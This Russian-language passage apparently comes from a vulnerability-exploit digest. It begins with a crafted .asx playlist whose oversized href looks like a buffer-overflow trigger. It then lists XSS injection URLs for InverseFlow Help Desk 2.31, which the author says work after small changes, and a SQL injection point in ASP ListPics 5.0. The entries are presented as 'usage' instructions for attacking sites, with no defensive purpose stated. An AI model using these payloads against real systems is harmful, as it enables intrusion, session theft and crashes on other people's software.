Использование:
Создаём файл "example.asx": <asx><entry>
<ref
href="aa:/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.mp3"/>
</entry></asx> Комментарий::
Так как я пользуюсь Win2k, то соответственно проверить правдивость этой
уязвимости я не могу.
ПО: InverseFlow Help Desk
Версия: 2.31
Использование: http://www.site.com/support_path/ticketview.php?id=[xss]
http://www.site.com/support_path/ticketview.php?email=[xss]
http://www.site.com/support_path/ticketview.php?cmd=deletepost&id=[xss]
http://www.site.com/support_path/ticketview.php?cmd=deletepost&email=[xss]
http://www.site.com/support_path/ticket.php?email=[xss] Комментарий::
Уязимость была проверена - 100% работа. Правда придётся коё-что
подправлять, но это мелочи.
ПО: ASP ListPics
Версия: 5.0
Использование:
http://target/path/listpics.asp?a=show&ID=[SQL INJECTION] Комментарий::
Не смог провериь данную уязвимость.